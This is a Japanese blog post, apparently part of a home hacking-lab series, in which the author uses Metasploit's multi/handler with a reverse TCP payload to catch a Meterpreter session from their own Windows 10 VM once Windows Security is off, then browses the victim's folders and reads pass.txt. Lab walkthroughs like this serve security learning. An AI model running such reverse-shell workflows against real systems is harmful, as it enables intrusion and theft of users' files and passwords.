【ハッキングラボ】仮想windows10に仕掛けてみる編②【セキュリティ】
********** 前回の記事 **********
********************
6.待ち構える
ウイルスが感染したら,KALIにアクセスできるように待ち受けておきます.
┌──(masaki㉿kali)-[~]
└─$ msfconsole 130 ⨯
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.0.56-dev ]
+ -- --=[ 2154 exploits - 1146 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Enable HTTP request and response logging
with set HttpTrace true
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload
payload => generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.56.111
LHOST => 192.168.56.111
msf6 exploit(multi/handler) > exploit -j -z
7.ウイルス感染(パターン1)
windowsセキュリティをONした状況でダウンロードしたパターンです.
結論から言うと失敗します.
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.56.111:4444
msf6 exploit(multi/handler) > [-] Command shell session 1 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 1 closed.
[*] 192.168.56.102 - Command shell session 2 closed.
[*] 192.168.56.102 - Command shell session 3 closed.
[*] 192.168.56.102 - Command shell session 4 closed.
[*] 192.168.56.102 - Command shell session 5 closed.
[*] 192.168.56.102 - Command shell session 6 closed.
[*] 192.168.56.102 - Command shell session 7 closed.
[*] 192.168.56.102 - Command shell session 8 closed.
[*] 192.168.56.102 - Command shell session 9 closed.
[*] 192.168.56.102 - Command shell session 10 closed.
[*] 192.168.56.102 - Command shell session 11 closed.
[-] Command shell session 12 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 12 closed.
[-] Command shell session 13 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 13 closed.
[*] 192.168.56.102 - Command shell session 14 closed.
[-] Command shell session 15 is not valid and will be closed
[*] 192.168.56.102 - Command shell session 15 closed.
[*] 192.168.56.102 - Command shell session 16 closed.
ccccccccccccccccccccccccccInterrupt: use the 'exit' command to quit
msf6 exploit(multi/handler) >
8.ウイルス感染(パターン2)
windowsセキュリティをOFFしてダウンロードしたパターンです.こちらは成功します.アクセスが確立されていることが分かります.
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.56.111:4444
msf6 exploit(multi/handler) > [*] Sending stage (200262 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.111:4444 -> 192.168.56.102:60593) at 2021-10-17 11:13:17 +0900
msf6 exploit(multi/handler) > session -i
[-] Unknown command: session
msf6 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windo DESKTOP-F0Q8FDQ\masak 192.168.56.111:4444 ->
ws i @ DESKTOP-F0Q8FDQ 192.168.56.102:60593
(192.168.56.102)
9.侵入実験
ここから,Windows10に侵入してファイルの中身を見ていきましょう.
pass.txtの中身が判明してしまいました.
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > pwd
C:\Users\masaki\Downloads
meterpreter > cd ..
meterpreter > cd Documents
meterpreter > ls
Listing: C:\Users\masaki\Documents
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2021-10-10 21:06:47 +0900 My Music
40777/rwxrwxrwx 0 dir 2021-10-10 21:06:47 +0900 My Pictures
40777/rwxrwxrwx 0 dir 2021-10-10 21:06:47 +0900 My Videos
100666/rw-rw-rw- 402 fil 2021-10-10 21:08:51 +0900 desktop.ini
100666/rw-rw-rw- 14 fil 2021-10-17 11:19:21 +0900 pass.txt
meterpreter > cat pass.txt
sample pas txt
meterpreter >
-------------------------------------------------------
また,次回の記事で会いましょう.
この記事が気に入ったらサポートをしてみませんか?